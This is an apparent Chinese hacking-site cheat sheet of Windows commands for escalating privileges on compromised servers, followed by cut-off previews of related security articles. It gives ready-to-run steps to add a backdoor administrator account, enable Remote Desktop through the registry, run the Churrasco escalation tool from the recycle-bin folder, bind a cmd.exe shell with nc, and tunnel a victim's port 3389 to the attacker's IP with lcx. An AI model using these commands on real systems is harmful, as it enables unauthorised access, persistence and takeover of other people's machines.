CMD部分提权常用命令
ipconfig 显示本地IP地址
net start telnet 开telnet服务
net use z:127.0.0.1c$ 映射对方的C盘
net user 查看所有用户列表
net user hucxsz hucxsz /add 添加用户hucxsz密码为hucxsz
net localgroup administrators hucxsz /add 将帐号hucxsz升级为管理员
开3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
———————————–
巴西烤肉 Churrasco.exe “命令”
使用 *** :
C:\RECYCLER\Chu.exe “net user hucxsz hucxsz /add && net localgroup administrators hucxsz /add”
C:\RECYCLER\Chu.exe “net user admin$ /del” 删除帐号
query user 查看会话
logoff ID号 踢掉
C:\RECYCLER\Chu.exe “logoff 1″
———————————–
NC反弹
路径\nc.exe -l -p 端口 -t -e 路径\cmd.exe
c:\RECYCLER\nc.exe -l -p 1234 -t -e c:\RECYCLER\cmd.exe
NC上传
DOS界面下运行:
NC -vv www.baidu.com 80<1.txt
-vv: 回显
80: www端口
1.txt: 就是你要发送的数据包
———————————–
LCX端口转发
先本地监听51端口 lcx.exe -listen 51 3389
c:\recycler\lcx.exe -slave 自己的ip 51 肉鸡IP 3389 LCX转发
c:\recycler\lcx.exe -slave 222.222.222.222 51 111.111.111.111 3389
今天无聊在帮一个站做渗透测试的时候,旁注找到一个asp企业站,asp好站拿点嘛,所以还是非常开心的,其中一个asp站,有这样的链接: http://www.xxx.cn/news_list....
Charles的应用,我也已不多讲过,通俗化的讲:Charles便是一款抓包软件。 能够参照Charles抓包软件剖析实例教程: https://www.fujieace.com/hacker/ch...
御剑后台管理扫描仪珍藏版是T00LS大神的著作,便捷搜索客户后台管理详细地址,另外也为软件开发工作人员提升了难度系数,尽可能与众不同的后台管理文件目录构造。 附加很强劲的词典,词典大家也是能够自身改...
服务器提权之webshell提权的一些经验总结。 第一,WEBSHELL 权限提升技巧 C:\DocumentsandSettings\AllUsers\Applic...
传统的安全漏洞会经常出现在移动应用程序软件中,但是看起来我们却是在尝试验证Albert Einstein的荒唐定义:我们屡次做同样的事情却期待不同的结果。 在过去的几个月...
什么叫Snort? Snort是由Martin Roesch建立的开源系统互联网入侵防御系统系统软件(NIDS)和互联网侵入防护系统(NIPS)。自2014年至今,Snort已由思科交换机全部。Sn...